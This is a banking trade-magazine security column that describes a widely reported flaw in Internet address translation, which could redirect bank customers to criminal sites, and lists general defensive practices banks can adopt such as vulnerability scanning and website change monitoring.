By John Jaser
Is the Internet safe? Bankers have had reasons a-plenty to ask that question over the years. Phishing, hijacking, and botnet armies have undermined the perceived security of this growing business channel.
No doubt, bankers were asking the question yet again when they read the July 9 headline “Critical flaw rocks the Internet.” The article revealed that major hardware and software developers had been secretly working for months to fix a fundamental Internet error that would have turned control of Web traffic over to the hackers.
The flaw concerned the way browsers, servers and routers translate www.xyz.com into the real address, which looks more like 111.212.056.144. When translated correctly, the web surfer goes to xyz.com. When hacked, the web surfer will go wherever the criminals want him to go, regardless of the Web site address typed into the browser.
Imagine what the “phishers” and other criminals could do with that. Bank customers would type in www.mybank.com and find themselves at www.mycriminal.com without ever knowing the difference. Say goodbye to passwords, birth dates, and mothers’ maiden names. The hackers could get them all.
The good news is that hardware and software developers came together, created a fix and coordinated a release for all computer software platforms. The patch’s design prevents hackers from “reverse engineering” the patch, and technical details about the flaw were kept secret for a month after the patch’s release to allow companies time to update their computers.
The bad news is that the flaw was found by accident. For those of us who keep asking if the Internet is safe, the answer continues to be, “We just don’t know.” That’s not good enough for the increasing numbers of customers who are switching their banking business to the web.
For banks and other financial institutions to keep the Internet safe for their customers, each needs to:
Subscribe to a daily vulnerability assessment service such as Hackersafe to scan the institution’s website and mitigate any vulnerabilities reported. Prompt attention to coding errors and other flaws can prevent the bank’s Web site from “relaying” hacker code to unsuspecting customers.
Monitor the institution’s Web site for any unauthorized changes. Your security teams should review all configuration changes requested by your institution’s staff and match those changes with the ones listed in your institution’s website change report. These fundamental tools will ensure that your staff isn’t fiddling where they shouldn’t be and that that your Web site hasn’t been altered by someone you don’t know.
Review your Web site hosting service’s most current Internet security report. If your service doesn’t provide a report, insist on it. If you don’t get one, your regulators may insist on it at your next exam.
Review reports of blocked traffic and email usage on a regular basis. We recommend at least weekly if not daily to detect potential issues rising from criminal minds.
Contract for a vulnerability scan of your institution’s internal network on a regular basis. If you keep looking, eventually you will find!
Listen to your customers’ reports of unusual e-mails and website pages. They are your early warning system on the World Wide Web.
These measures won’t prevent massive errors such as the addressing issue reported above, but you will know sooner than your competitors that a problem exists, and be able to protect your customers. That’s what it takes to keep today’s Internet safe for the banking business.
John Jaser is an Internet security manager at Avon, Conn.-based COCC Inc., (www.cocc.com), a 41-year-old firm specializing in outsourced information technology and support. “Guarding the Gate” is a regular feature in Banking New York focusing on banking technology and security trends.